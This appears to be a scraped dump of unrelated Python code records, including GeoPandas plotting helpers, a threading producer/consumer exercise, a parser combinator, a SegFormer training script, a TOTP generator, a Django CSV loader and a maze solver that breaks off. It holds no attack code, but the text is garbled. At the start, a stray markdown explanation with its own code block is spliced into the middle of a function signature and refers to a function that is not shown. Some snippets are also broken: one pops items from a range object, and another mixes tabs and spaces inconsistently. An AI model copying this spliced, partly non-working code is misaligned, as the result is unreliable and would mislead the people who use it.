gp_plotLabels(fgp,labelcol=[],ax=None,mapon=False,includegeom=False,delimiter=', ', # TODO Add geometry\n 
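`gp_Points2Lines` above shifts the geometry column by one row and joins each point to its successor; the same idea without pandas:

```python
# Pairing consecutive points into LineString segments, as gp_Points2Lines does.
from shapely.geometry import LineString, Point

points = [Point(0, 0), Point(1, 0), Point(1, 1)]
segments = [LineString([a, b]) for a, b in zip(points, points[1:])]
print([seg.length for seg in segments])  # [1.0, 1.0]
```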
figsize=(10,10),fontdict=gp_deffont,title=None,ctxprovider=ctxprovider,**kwargs):\n ''' GeoPandas DataFrame with 'geometry'containing Points '''\n if mapon:\n fgp = fgp.to_crs(epsg=3857)\n if ax is None:\n ax = plt.figure(figsize=figsize).add_subplot(111)\n gp_setAxesScales(ax,option=False)\n if len(labelcol) > 0:\n tlabgp = fgp[labelcol]\n tlabgp['geometry'] = fgp['geometry']\n tlabgp['label'] = tlabgp.apply(makeLabel,labelcol=labelcol,delimiter=delimiter,**kwargs,axis=1)\n tlabgp.apply(gp_plotLabel,ax=ax,fontdict=fontdict,**kwargs,axis=1)\n if not title is None:\n gp_setTitle(ax,title)\n if mapon:\n ctx.add_basemap(ax, source=ctxprovider)\n return ax\n\ndef gp_printCTXproviders(printon=False):\n provlst=[]\n for key in ctx.providers:\n if 'url' in ctx.providers[key].keys():\n provlst.append(ctx.providers[key]['name'])\n else:\n for subkey in ctx.providers[key]:\n try:\n provlst.append(ctx.providers[key][subkey]['name'])\n except:\n pass\n provlst.sort()\n if printon:\n devnull = [\"ctx.providers.\"+print(name) for name in provlst]\n return provlst\n\n''' Shapefiles '''\ndef getShapeFile(fn):\n return shp.Reader(fn)\ndef gp_readShapefile(fn): \n return gp.read_file(fn)\ndef plotShapeFile(sf, ax = None, figsize=(20,20), **kwargs):\n if ax is None:\n ax = plt.figure(figsize=figsize).add_subplot(111)\n for shape in sf.shapeRecords():\n x = [i[0] for i in shape.shape.points[:]]\n y = [i[1] for i in shape.shape.points[:]]\n ax.plot(x,y)\n return ax\ndef getCentroidPoly(geom): \n return geom.centroid if isinstance(geom, Polygon) else np.nan \n\n### Tile provider sources ###\n\n# ST_TONER = 'http://tile.stamen.com/toner/tileZ/tileX/tileY.png'\n# ST_TONER_HYBRID = 'http://tile.stamen.com/toner-hybrid/tileZ/tileX/tileY.png'\n# ST_TONER_LABELS = 'http://tile.stamen.com/toner-labels/tileZ/tileX/tileY.png'\n# ST_TONER_LINES = 'http://tile.stamen.com/toner-lines/tileZ/tileX/tileY.png'\n# ST_TONER_BACKGROUND = 'http://tile.stamen.com/toner-background/tileZ/tileX/tileY.png'\n# ST_TONER_LITE = 'http://tile.stamen.com/toner-lite/tileZ/tileX/tileY.png'\n\n# ST_TERRAIN = 'http://tile.stamen.com/terrain/tileZ/tileX/tileY.png'\n# ST_TERRAIN_LABELS = 'http://tile.stamen.com/terrain-labels/tileZ/tileX/tileY.png'\n# ST_TERRAIN_LINES = 'http://tile.stamen.com/terrain-lines/tileZ/tileX/tileY.png'\n# ST_TERRAIN_BACKGROUND = 'http://tile.stamen.com/terrain-background/tileZ/tileX/tileY.png'\n\n# ST_WATERCOLOR = 'http://tile.stamen.com/watercolor/tileZ/tileX/tileY.png'\n\n# # OpenStreetMap as an alternative\n# OSM_A = 'http://a.tile.openstreetmap.org/tileZ/tileX/tileY.png'\n# OSM_B = 'http://b.tile.openstreetmap.org/tileZ/tileX/tileY.png'\n# OSM_C = 'http://c.tile.openstreetmap.org/tileZ/tileX/tileY.png'\n\n ","repo_name":"cmusatyalab/PyEdgeSim","sub_path":"lib/gputils.py","file_name":"gputils.py","file_ext":"py","file_size_in_byte":13583,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"35"} +{"seq_id":"12620770637","text":"from threading import Thread\nfrom random import randint\nfrom time import sleep\n\nclass Consumer(Thread):\n\t\"\"\"\n\tPops integers from a queue.\n\t\"\"\"\n\t\n\tdef __init__ (self, t, q, n, p):\n\t\t\"\"\"\n\t\tThread t to pop n integers from q.\n\t\t\"\"\"\n\t\tThread.__init__(self, name=t)\n\t\tself.queue = q\n\t\tself.amount = n\n\t\tself.pace = p\n\t\n\tdef run(self):\n\t\t\"\"\"\n\t\tPops integers at some pace.\n\t\t\"\"\"\n\t\tprint (\"Consumption starts...\")\n\t\tfor i in range(0, self.amount):\n\t\t\trnd = randint(1, 
self.pace)\n\t\t\tprint(self.getName() + \" sleeps %d seconds\" %rnd)\n\t\t\tsleep(rnd)\n\t\t\t\n\t\t\twhile True:\n\t\t\t\ttry:\n\t\t\t\t\ti = self.queue.pop(0)\n\t\t\t\t\tprint (\"Popped %d from queue\" %i)\n\t\t\t\t\tbreak\n\t\t\t\texcept IndexError:\n\t\t\t\t\tprint (\"Espera un segundo...\")\n\t\t\t\t\tsleep(1)\n\t\tprint(\"Consumption terminated\")\n\t\t\n\t\n\t\ndef main():\n\t\"\"\"\n\tSimulates consumption on somo queue\n\t\"\"\"\n\tque = range(5)\n\tcns = Consumer('Consumer', que, 5, 10)\n\tcns.start()\n\tcns.join()\n\t\nif __name__ == '__main__':\n\tmain()\n\t\nclass Producer(Thread):\n \"\"\"\n\tAppends integers to a queue.\n\t\"\"\"\n def __init__(self, t, q, a, b, p):\n \"\"\"\n Thread t to add integers in [a,b] to q, sleeping between 1 and p seconds.\n \"\"\"\n Thread.__init__(self, name=t)\n self.queue = q\n self.begin = a\n self.end = b\n self.pace = p \n \n def run(self):\n \"\"\"\n\t\tproduces integers at some pace.\n\t\t\"\"\"\n print (self.getName() + \" starts...\")\n for i in range(self.begin, self.end+1):\n rnd = randint(1, self.pace)\n print (self.getName() + \\\n\t\t\t\t\"sleeps %d seconds\" % rnd)\n sleep(rnd)\n print (\"appending %d to queue\" % i)\n self.queue.append(i)\n print (\"Productor terminado\")\n\t\t\ndef main():\n\t\"\"\"\n\tcreates a producer object.\n\t\"\"\"\n\tque = []\n\tprd = Producer('producer', que, 3, 9, 10)\n\tprd.start()\n\tprd.join()\nif __name__==\"__main__\":\n\tmain()\n\n\n#Añadir un hola mundo\nprint(\"Hola Mundo\");\n\t\n\t\n\t\n\t\t\t\n","repo_name":"chrisb1397/Software_Productor_Consumidor","sub_path":"consumidor.py","file_name":"consumidor.py","file_ext":"py","file_size_in_byte":1920,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"25878233767","text":"from functools import reduce\r\nfrom typing import Callable, Literal, TypeAlias\r\nfrom decimal import Decimal\r\n\r\nfrom types_ import AstElement\r\nfrom parser_combinator import (\r\n Parser,\r\n Reserved,\r\n Number,\r\n Lazy,\r\n Phrase,\r\n)\r\nfrom nodes import BinOperationNode\r\n\r\n\r\nPLUS, MINUS = Reserved(\"+\"), Reserved(\"-\")\r\nTIMES, DIVIDE = Reserved(\"*\"), Reserved(\"/\")\r\nLPAREN, RPAREN = Reserved(\"(\"), Reserved(\")\")\r\n\r\n\r\nParenthisExpression: TypeAlias = (\r\n tuple[tuple[Literal[\"(\"], AstElement], Literal[\")\"]]\r\n)\r\n\r\n\r\ndef parenthis_parse(\r\n expr: ParenthisExpression) -> AstElement:\r\n ((_, response), _) = expr\r\n return response\r\n\r\n\r\ndef factor() -> Parser:\r\n return (\r\n Number() |\r\n (LPAREN + Lazy(expression) + RPAREN) ^ parenthis_parse\r\n )\r\n\r\n\r\nBinNumbers: TypeAlias = float | int | Decimal\r\n\r\n\r\ndef bin_operation(\r\n operator: str) -> Callable[[BinNumbers, BinNumbers], BinOperationNode]:\r\n return (lambda left, right: BinOperationNode(operator, left, right))\r\n\r\n\r\ndef any_operator_in_list(operators: list[str]) -> Parser:\r\n operators_parsers: list[Parser] = (\r\n [Reserved(operator) for operator in operators]\r\n )\r\n parser = reduce(\r\n (lambda left, right: left | right),\r\n operators_parsers\r\n )\r\n return parser\r\n\r\n\r\ndef get_precedence() -> list[list[str]]:\r\n return [\r\n [\"^\", ],\r\n [\"*\", \"/\"],\r\n [\"+\", \"-\"],\r\n ]\r\n\r\n\r\nCombine: TypeAlias = (\r\n Callable[[str], Callable[[BinNumbers, BinNumbers], BinOperationNode]]\r\n)\r\n\r\n\r\ndef operator_parser(precedence_level: list[str], combine: Combine) -> Parser:\r\n return any_operator_in_list(precedence_level) ^ combine\r\n\r\n\r\ndef precedence(\r\n 
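The `Consumer` above busy-waits on a plain list, catching `IndexError` and sleeping a second at a time. The standard library's `queue.Queue` gives the same producer/consumer hand-off with a blocking `get()` and no polling; a minimal equivalent of the two classes:

```python
# queue.Queue replaces the list + IndexError polling loop above.
from queue import Queue
from threading import Thread

q = Queue()

def producer():
    for i in range(3, 10):       # produce the integers 3..9
        q.put(i)

def consumer(n):
    for _ in range(n):
        print("popped", q.get())  # blocks until an item is available

threads = [Thread(target=producer), Thread(target=consumer, args=(7,))]
for t in threads:
    t.start()
for t in threads:
    t.join()
```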
value_parser: Parser,\r\n precedence_levels: list[list[str]],\r\n combine: Combine) -> Parser:\r\n parser = value_parser * operator_parser(precedence_levels[0], combine)\r\n\r\n for precedence_level in precedence_levels[1:]:\r\n parser = parser * operator_parser(precedence_level, combine)\r\n\r\n return parser\r\n\r\n\r\ndef expression() -> Parser:\r\n return precedence(\r\n factor(),\r\n get_precedence(),\r\n bin_operation\r\n )\r\n\r\n\r\ndef parser() -> Phrase:\r\n return Phrase(expression())\r\n","repo_name":"OlejaPythonist/calculator","sub_path":"calculator/arithmetic_parser.py","file_name":"arithmetic_parser.py","file_ext":"py","file_size_in_byte":2240,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"62669615","text":"import random\n\nfrom transformers import SegformerImageProcessor\nfrom SegformerFinetuner import SegformerFinetuner\nfrom carla import CarlaImagesDataset\nfrom torch.utils.data import Dataset, DataLoader\nimport torch\n\nfrom pytorch_lightning.callbacks.early_stopping import EarlyStopping\nfrom pytorch_lightning.callbacks.model_checkpoint import ModelCheckpoint\nimport pytorch_lightning as pl\nfrom multiprocessing import freeze_support\n\ndef main():\n seed = torch.Generator().manual_seed(42)\n data_root = \"D:/WorkSpace/Carla1/carla_images_ft\"\n\n feature_extractor = SegformerImageProcessor.from_pretrained(\"nvidia/segformer-b5-finetuned-cityscapes-1024-1024\")\n feature_extractor.do_reduce_labels = False\n\n dataset = CarlaImagesDataset(data_root, feature_extractor)\n train_dataset, val_dataset = torch.utils.data.random_split(dataset,\n [int(len(dataset) * 0.8), int(len(dataset) * 0.2)],\n generator=seed)\n\n batch_size = 2\n train_dataloader = DataLoader(train_dataset, batch_size=batch_size, shuffle=True, num_workers=1, prefetch_factor=8)\n val_dataloader = DataLoader(val_dataset, batch_size=batch_size, num_workers=1, prefetch_factor=8)\n id2label = dataset.id2label\n num_classes = len(id2label)\n label2id = {v: k for k, v in id2label.items()}\n torch.set_float32_matmul_precision('high')\n\n # jitter = ColorJitter(brightness=0.25, contrast=0.25, saturation=0.25, hue=0.1)\n\n segformer_finetuner = SegformerFinetuner(\n dataset.id2label,\n train_dataloader=train_dataloader,\n val_dataloader=val_dataloader,\n # test_dataloader=test_dataloader,\n metrics_interval=10,\n )\n\n early_stop_callback = EarlyStopping(\n monitor=\"val_loss\",\n min_delta=0.00,\n patience=3,\n verbose=False,\n mode=\"min\",\n )\n\n checkpoint_callback = ModelCheckpoint(save_top_k=1, monitor=\"val_loss\")\n trainer = pl.Trainer(\n num_nodes=1,\n callbacks=[early_stop_callback, checkpoint_callback],\n max_epochs=50,\n val_check_interval=len(train_dataloader),\n )\n\n trainer.fit(segformer_finetuner)\n\nif __name__ == '__main__':\n # freeze_support()\n main()\n\n","repo_name":"zhanghang211202/segformer_ft","sub_path":"train_carla.py","file_name":"train_carla.py","file_ext":"py","file_size_in_byte":2290,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"31136400982","text":"import pyotp\nimport sys\n\n#########\nclass cloudflare:\n codename = None\n def __init__(self):\n self.authySecret = \"ABCDEFGHIJKLMNOPQRSTUVWXYZ\" # change your authysecret key\n def getAuthy(self):\n totp = pyotp.TOTP(self.authySecret)\n totp.digits = 7\n totp.interval = 10\n totp.issuer = \"Cloudflare\"\n return(totp.now())\n\nc1 = cloudflare()\nprint(\"Authy token code : 
\",c1.getAuthy())\n","repo_name":"sailay1996/pyauthy","sub_path":"authy.py","file_name":"authy.py","file_ext":"py","file_size_in_byte":426,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"35"} +{"seq_id":"43004990331","text":"from __future__ import (absolute_import, division, print_function,\n                        unicode_literals)\nimport os\nimport xml.etree.ElementTree as ET\nimport logging\n\nlog = logging.getLogger(__name__)\n\n\nclass TestData(object):\n    def __init__(self, data_folder):\n        self.data_folder = data_folder\n\n    def get_test_data(self, test_number):\n        # Create the test file name\n        filename = os.path.join(self.data_folder,\n                                \"test{0}\".format(test_number))\n\n        # The user should handle the exception from failing to find the file.\n        tree = ET.parse(filename)\n\n        # We need the text.\n        reply = tree.find(\"reply\")\n        data = reply.find(\"data\")\n\n        # Return the text contents of the data\n        return data.text\n\n\nif __name__ == '__main__':\n    td = TestData(\"./data\")\n    data = td.get_test_data(1)\n    print(data)\n","repo_name":"huokedu/Open-Source-Cryptocurrency-Exchange","sub_path":"M/build-x86_64-linux-gnu/curl-7.55.1/tests/curl_test_data.py","file_name":"curl_test_data.py","file_ext":"py","file_size_in_byte":900,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"35"} +{"seq_id":"42770694142","text":"from django.core.management.base import BaseCommand\nfrom django.db import transaction\n\n\nfrom device.models.device import (\n    Device,\n    Data,\n)\nimport csv\nimport json\nimport sys\nfrom datetime import datetime\n\n\nclass Command(BaseCommand):\n\n    \"\"\"\n    Command to load initial data into database.\n    \"\"\"\n\n    help = 'Loads initial data set into database.'\n\n    def add_arguments(self, parser):\n        # Positional arguments\n        parser.add_argument('device_ip', nargs='+', type=str)\n\n        # Named (optional) arguments\n        parser.add_argument(\n            '--datafile',\n            default='',\n            help='Use the data file as source.',\n        )\n\n    @transaction.atomic\n    def handle(self, *args, **options):\n\n        data_file = options.get('datafile', None)\n\n        device_ip = options.get('device_ip')\n\n        if not device_ip:\n            sys.exit(\"Device ip not provided.\")\n\n        # Find the device\n        device, created = Device.objects.get_or_create(ip_address=device_ip[0])\n        if created:\n            device.save()\n\n        data = []\n        if data_file:\n            data, data_type = self.read_data_file(data_file)\n\n        if len(data) > 1:\n            header = data[0]\n            header_dict = {}\n            for idx, title in enumerate(header):\n                header_dict.update({\n                    title: idx\n                })\n            data = data[1:]\n\n            for data_line in data:\n                print(data_line)\n                data_obj = Data(\n                    device=device,\n                    data_arrival_time=datetime.strptime(data_line[header_dict['time']], \"%d-%b-%Y %H:%M\"),\n                    voltage=data_line[header_dict['voltage']].replace('.', ''),\n                    current=data_line[header_dict['current']].replace('.', ''),\n                    power=data_line[header_dict['power']].replace('.', ''),\n                    energy=data_line[header_dict['energy']].replace('.', ''),\n                    runtime=data_line[header_dict['runtime']].replace('.', ''),\n                    state=0\n                )\n                data_obj.save()\n\n    def read_data_file(self, datafile):\n        data = []\n        file_type = datafile.split('.')[-1]\n        if 'json' in file_type:\n            json_file = open(datafile, encoding='utf-8')\n            data = json.load(json_file)\n            json_file.close()\n        elif 'csv' in file_type:\n            with open(datafile) as csvfile:\n                spamreader = csv.reader(csvfile, delimiter=',')\n                for row in spamreader:\n                    data.append(row)\n        return data, 
file_type\n","repo_name":"vkylamba/IoT-Management","sub_path":"src/device/management/commands/load_csv.py","file_name":"load_csv.py","file_ext":"py","file_size_in_byte":2572,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"35"} +{"seq_id":"42218558067","text":"import numpy as np\r\nfrom datetime import timedelta,datetime\r\nimport matplotlib.pyplot as plt\r\n#### for sample code, see read_DAQ.DAQ_time\r\n##def to_seconds(time_delta):\r\n##    ## this is so that we can convert arrays of timedelta objects to arrays of seconds\r\n##    return time_delta.total_seconds()\r\n##to_seconds=np.vectorize(to_seconds) ## so that we can apply this function to arrays\r\n\r\ndef BCD(data):\r\n    \"\"\" given a list of 0s and 1s, convert to a binary coded decimal, where the least significant digit is FIRST. The length of data must be divisible by 4 \"\"\"\r\n    if len(data)%4 !=0:\r\n        print(\"ERROR!, length of data must be divisible by 4 in BCD\")\r\n        exit()\r\n\r\n    N_digits=len(data)/4\r\n    num=0*data[0] ## data may be a list of floats, or list of arrays of floats\r\n    for i in range(int(N_digits)):\r\n        num+=sum( [ (10**i)*(2**ind)*b for ind,b in enumerate(data[4*i:4*(i+1)])] )\r\n    return num\r\n
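\r\n## worked example (added for illustration): bits are consumed four at a time,\r\n## least-significant decimal digit first, so\r\n## BCD([1,0,0,0, 0,1,0,0]) == 1*1 + 2*10 == 21\r\n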
\r\nIRIGA_rate=1000\r\ntime_frame=0.1\r\n\r\nsampling_rate=10e6\r\ndef IRIGA_signal(signal, sampling_rate, year=2000):\r\n    \"\"\"for an IRIG-A signal that is sampled at sampling_rate (sampling rate is assumed to be perfect)\r\n    this function returns a datetime object and an array of floats that is time in seconds relative to the datetime object\r\n    sampling_rate should be a number, and signal should be a numpy array \"\"\"\r\n    \r\n    sampling_rate=float(sampling_rate)\r\n\r\n    signal=signal>(np.max(signal) + np.min(signal))*0.5 ## separate signal into \"high\" and \"low\"\r\n    ## this signal is a stream of bits. Each bit is when the signal is high. The kind of bit is determined by the width.\r\n    ## there are exactly 1000 bits per second\r\n\r\n    bit_pos=np.where( signal[1:]>signal[:-1] )[0] ## positions of the beginning of each bit\r\n    bit_end_pos=np.where( signal[1:]<signal[:-1] )[0] ## positions of the end of each bit\r\n    bit_width=bit_end_pos-bit_pos ## width of each bit, in samples\r\n    bit_type=np.zeros(len(bit_pos))-1 ## bit type; position bits keep the default value of -1\r\n    bit_type[ np.logical_and(bit_width>=0.0002*sampling_rate-1, bit_width<=0.0002*sampling_rate+1) ] = 0 ## 0 will mean a low bit ## sometimes there is a sampling error, and the width is one point too short or too long\r\n    bit_type[ np.logical_and(bit_width>=0.0005*sampling_rate-1, bit_width<=0.0005*sampling_rate+1) ] = 1 ## 1 will mean a high bit\r\n\r\n    ## now all the bit_types that are position bits have the value -1\r\n    ## there are two kinds of position bits: the first kind occurs 10 times in a 0.1 second, this kind counts from 0 to 9. The second kind of position bit is a position reference bit. It happens once in a 0.1 second, and always happens after a 0 position bit.\r\n    ## thus, if there are two bits in a row, the first is a 0 position bit, the second is a position reference bit\r\n    ## we will identify the position reference bit with a 2, and a normal position bit will be identified with a -1\r\n    bit_type[1:][ np.logical_and( bit_type[:-1]==-1, bit_type[1:]==-1) ]=2\r\n\r\n    referance_bit_indeces=np.where(bit_type==2)[0] ## the position reference bit (a bit type of 2) always happens at exactly the tenth of a second time\r\n    last_referance_bit=referance_bit_indeces[-1]\r\n    referance_bit_indeces=referance_bit_indeces[:-1] ## the last time frame will not be complete. So we will ignore it.\r\n    N_time_frames=len(referance_bit_indeces)\r\n    time_frame_signal_pos=bit_pos[referance_bit_indeces]\r\n    ZEROS=np.zeros(N_time_frames)\r\n    \r\n    \r\n    \r\n    \r\n#    BAD= np.where(referance_bit_indeces[:-1]-referance_bit_indeces[1:] + 100 !=0)[0]\r\n#    \r\n#    print referance_bit_indeces[BAD], referance_bit_indeces[BAD+1], referance_bit_indeces[BAD+2]\r\n#    B=0\r\n#\r\n#    print bit_type[referance_bit_indeces[BAD[B]]:referance_bit_indeces[BAD[B]+2]]\r\n#    \r\n#    for RB in xrange(referance_bit_indeces[BAD[B]]-1, referance_bit_indeces[BAD[B]+2]+1):\r\n#        if bit_type[RB]==-1:\r\n#            t='g'\r\n#        elif bit_type[RB]==2:\r\n#            t='b'\r\n#        else:\r\n#            t='r'\r\n#        \r\n#        plt.plot( np.arange(bit_pos[RB],bit_pos[RB+1]), signal[bit_pos[RB]:bit_pos[RB+1]],t)\r\n#    plt.show()\r\n    \r\n\r\n    ## now we use the information encoded after each reference bit to find the time information\r\n    ## I don't even know how to document this next bit so that it makes sense. Just trust me.\r\n    seconds=BCD([bit_type[referance_bit_indeces+1],bit_type[referance_bit_indeces+2],bit_type[referance_bit_indeces+3],bit_type[referance_bit_indeces+4], bit_type[referance_bit_indeces+6],bit_type[referance_bit_indeces+7],bit_type[referance_bit_indeces+8], ZEROS])\r\n\r\n    minutes=BCD([bit_type[referance_bit_indeces+10],bit_type[referance_bit_indeces+11],bit_type[referance_bit_indeces+12],bit_type[referance_bit_indeces+13], bit_type[referance_bit_indeces+15],bit_type[referance_bit_indeces+16],bit_type[referance_bit_indeces+17],ZEROS])\r\n\r\n    hours=BCD([bit_type[referance_bit_indeces+20],bit_type[referance_bit_indeces+21],bit_type[referance_bit_indeces+22],bit_type[referance_bit_indeces+23], bit_type[referance_bit_indeces+25],bit_type[referance_bit_indeces+26],ZEROS,ZEROS])\r\n\r\n    days=BCD([bit_type[referance_bit_indeces+30],bit_type[referance_bit_indeces+31],bit_type[referance_bit_indeces+32],bit_type[referance_bit_indeces+33], bit_type[referance_bit_indeces+35],bit_type[referance_bit_indeces+36],bit_type[referance_bit_indeces+37],bit_type[referance_bit_indeces+38], bit_type[referance_bit_indeces+40],bit_type[referance_bit_indeces+41],ZEROS,ZEROS ])\r\n\r\n    tenths_seconds=BCD([bit_type[referance_bit_indeces+45],bit_type[referance_bit_indeces+46],bit_type[referance_bit_indeces+47],bit_type[referance_bit_indeces+48]])\r\n\r\n    ## now we can generate the time objects based on the info in the next frame\r\n    ##time_info=np.empty(N_time_frames, dtype=timedelta)\r\n    initial_timedelta=timedelta(days=days[0], hours=hours[0], minutes=minutes[0], seconds=seconds[0]+tenths_seconds[0]/10.0) - timedelta(seconds=time_frame_signal_pos[0]/float(sampling_rate))\r\n    initial_timestamp=datetime(year=year, month=1, day=1)+initial_timedelta\r\n\r\n    time=np.empty(len(signal), dtype=np.double)\r\n    time_indeces=np.arange(len(signal))\r\n    \r\n    start_signal_index=0\r\n    for i in range(N_time_frames):\r\n        \r\n        signal_i=time_frame_signal_pos[i] \r\n        \r\n        ##check that the frame is good\r\n        if (i!=N_time_frames-1 and referance_bit_indeces[i+1]-referance_bit_indeces[i]!=100) or (i==N_time_frames-1 and last_referance_bit-referance_bit_indeces[i]!=100): \r\n            ##the frame is bad if there is not exactly 100 bits to the next frame\r\n            seconds_from_timestamp=time[start_signal_index-1]+1.0/sampling_rate ## this may not work. Assumes that seconds from timestamp is at the beginning of the frame. 
Is this true?\r\n            print(\"This IRIG has T1 issues, suggest 'retiming'\")\r\n        \r\n        else:\r\n            seconds_from_timestamp=(timedelta(days=days[i], hours=hours[i], minutes=minutes[i], seconds=seconds[i]+tenths_seconds[i]/10.0)-initial_timedelta).total_seconds()\r\n        \r\n        if seconds_from_timestamp<0: ## some other issue I haven't tracked down\r\n            seconds_from_timestamp=time[start_signal_index-1]+1.0/sampling_rate\r\n            print(\"This IRIG has T2 issues, suggest 'retiming'\")\r\n        \r\n        ## there are still more issues I have yet to track down.\r\n        \r\n        time[start_signal_index:signal_i]=seconds_from_timestamp+(time_indeces[start_signal_index:signal_i]-signal_i)/sampling_rate\r\n        \r\n        start_signal_index=signal_i\r\n\r\n    ## get the last bit\r\n    time[start_signal_index:]=seconds_from_timestamp+(time_indeces[start_signal_index:]-time_frame_signal_pos[i])/sampling_rate\r\n\r\n\r\n    ## and I processed an IRIG-A signal in Python with only one explicit loop. WOOT!\r\n    return initial_timestamp, time\r\n","repo_name":"felipelenz/Skywaves","sub_path":"IRIGA.py","file_name":"IRIGA.py","file_ext":"py","file_size_in_byte":8290,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"35"} +{"seq_id":"37595201359","text":"import sys\n\nfrom builtin_types import BUILTIN_TYPES\nfrom mako.template import Template\n\ntemplate = \"\"\"\\\n/*\n * Copyright 2023 Intel Corporation\n * SPDX-License-Identifier: MIT\n */\n\n/* This is an automatically generated file. */\n\n#include \"glsl_types.h\"\n#include \"util/glheader.h\"\n\nconst char glsl_type_builtin_names[] =\n%for n in NAME_ARRAY:\n   \"${n}\"\n%endfor\n;\n\n%for t in BUILTIN_TYPES:\nconst struct glsl_type glsl_type_builtin_${t[\"name\"]} = {\n   %for k, v in t.items():\n   %if v is None or k == \"name\":\n   <% continue %>\n   %elif k == \"name_id\":\n   .name_id = ${v},\n   .has_builtin_name = 1,\n   %else:\n   .${k} = ${v},\n   %endif\n   %endfor\n};\n\n%endfor\"\"\"\n\nif len(sys.argv) < 2:\n    print('Missing output argument', file=sys.stderr)\n    sys.exit(1)\n\noutput = sys.argv[1]\n\n# Add padding to make sure zero is an invalid name.\ninvalid = \"INVALID\"\nNAME_ARRAY = [invalid + \"\\\\0\"]\nid = len(invalid) + 1\n\nfor t in BUILTIN_TYPES:\n    name = t[\"name\"]\n    NAME_ARRAY.append(name + \"\\\\0\")\n    t[\"name_id\"] = id\n    id += len(name) + 1\n\nwith open(output, 'w') as f:\n    f.write(Template(template).render(BUILTIN_TYPES=BUILTIN_TYPES, NAME_ARRAY=NAME_ARRAY))\n","repo_name":"google/dive","sub_path":"third_party/mesa/src/compiler/builtin_types_c.py","file_name":"builtin_types_c.py","file_ext":"py","file_size_in_byte":1191,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"35"} +{"seq_id":"72696255462","text":"#!/usr/bin/env python3\nimport sys\nimport itertools\nfrom collections import namedtuple, defaultdict\n\nState=namedtuple('State', ['positions', 'cost', 'code'])\n\nroom = [l.strip() for l in sys.stdin.readlines()]\n\nH = len(room)\nW = len(room[0])\n\nkeys = ''.join([chr(x) for x in range(ord('a'), ord('z') + 1)])\nrealKeys = []\ndoors = keys.upper()\nrealDoors = []\n\nfor y in range(H):\n    for x in range(W):\n        ch = room[y][x]\n        if ch == '@':\n            start = (y,x)\n        elif ch in keys:\n            realKeys.append(ch)\n        elif ch in doors:\n            realDoors.append(ch)\n\nroom = [ list(x) for x in room ]\n\nroom[start[0]][start[1]] = '#'\nroom[start[0]-1][start[1]] = '#'\nroom[start[0]+1][start[1]] = '#'\nroom[start[0]][start[1]-1] = '#'\nroom[start[0]][start[1]+1] = '#'\n\ns1 = (start[0]-1, start[1]-1)\nroom[start[0]-1][start[1]-1] = 
'@'\n\ns2 = (start[0]+1, start[1]-1)\nroom[start[0]+1][start[1]-1] = '@'\n\ns3 = (start[0]-1, start[1]+1)\nroom[start[0]-1][start[1]+1] = '@'\n\ns4 = (start[0]+1, start[1]+1)\nroom[start[0]+1][start[1]+1] = '@'\n\nroom = [ ''.join(x) for x in room ]\n\n\ninitial = State((s1, s2, s3, s4), 0, '@')\nprint(initial)\n\nfor l in room:\n    print(l)\n\ndef allKeysGathered(code):\n    return all([ch in code for ch in realKeys])\n\ndef neigbors(pos):\n    if len(pos) == 2:\n        y,x = pos\n    elif len(pos) == 3:\n        y,x,_ = pos\n    return [(y-1,x), (y+1,x),(y,x-1), (y,x+1)]\n    \ndef neigborsForSet(pos):\n    n = []\n    for p in pos:\n        nn = neigbors(p)\n        nn.append(p)\n        n.append(nn)\n    \n    return itertools.product(*n)\n\ndef getNextStates(state):\n    visited = set()\n    nextStates = []\n    \n    iteration = 1\n    q = []\n    q.extend(neigborsForSet(state.positions))\n    visited.add(state.positions)\n\n    while len(q) > 0:\n        ql = len(q)\n        for i in range(ql):\n            positions = q[i]\n\n            if positions in visited:\n                continue\n\n            visited.add(positions)\n\n            badPosition = False\n            for pos in positions:\n                y, x = pos\n                if x < 0 or x >= W or y < 0 or y >= H or room[y][x] == '#':\n                    badPosition = True\n                    break\n            \n            if badPosition:\n                continue\n\n            cannotMove = False\n            addCode = ''\n            for pos in positions:\n                y, x = pos \n                ch = room[y][x]\n\n                if ch in keys and ch not in state.code:\n                    # acquired key\n                    addCode += ch\n                    createsState = True\n                elif ch in doors and ch not in state.code:\n                    if ch.lower() in state.code:\n                        # opened door first time\n                        addCode += ch\n                        createsState = True\n                    else:\n                        # cutoff BFS (closed door)\n                        cannotMove = True\n            \n            if cannotMove:\n                continue\n\n            if addCode:\n                nextStates.append(State(positions, state.cost + iteration, state.code + addCode))\n            else:\n                q.extend(neigborsForSet(positions))\n        \n        q = q[ql:]\n        #print(iteration, 'done', ql, 'elements')\n        sys.stdout.flush()\n        iteration += 1\n\n    return nextStates\n\n\nprevStateCount = 0\nstates = [initial]\nfinalStates = []\n\nbestAllKeys = 1000000000\nbestAllKeysState = None\n\n# while prevStateCount != len(states):\nwhile len(states) > 0:\n    print('States count', len(states))\n    groups = defaultdict(lambda:[])\n    for s in states:\n        # same point, with same state so far\n        \n        l = list(s.code[:-1])\n        l.sort()\n        same = ''.join(l) + s.code[-1]\n        groups[same].append(s)\n\n        if allKeysGathered(s.code):\n            if s.cost < bestAllKeys:\n                bestAllKeys = s.cost\n                bestAllKeysState = s\n\n    states = []\n    for k,v in groups.items():\n        bestCost = 1000000000000\n        for s in v:\n            if s.cost < bestCost:\n                bestCost = s.cost\n        for s in v:\n            if s.cost == bestCost:\n                states.append(s)\n\n    print('Filtered count', len(states))\n    sys.stdout.flush()\n\n    prevStateCount = len(states)\n    nextStates = []\n    for s in states:\n        n = getNextStates(s)\n        if n:\n            nextStates.extend(n)\n        else:\n            finalStates.append(s)\n    states = nextStates\n\n    if len(states) < 50:\n        print(states)\n    \n\n# not 6039\n\nlowestCost = 1000000000000\nbestState = None\nfor s in finalStates:\n    if s.cost < lowestCost:\n        lowestCost = s.cost\n        bestState = 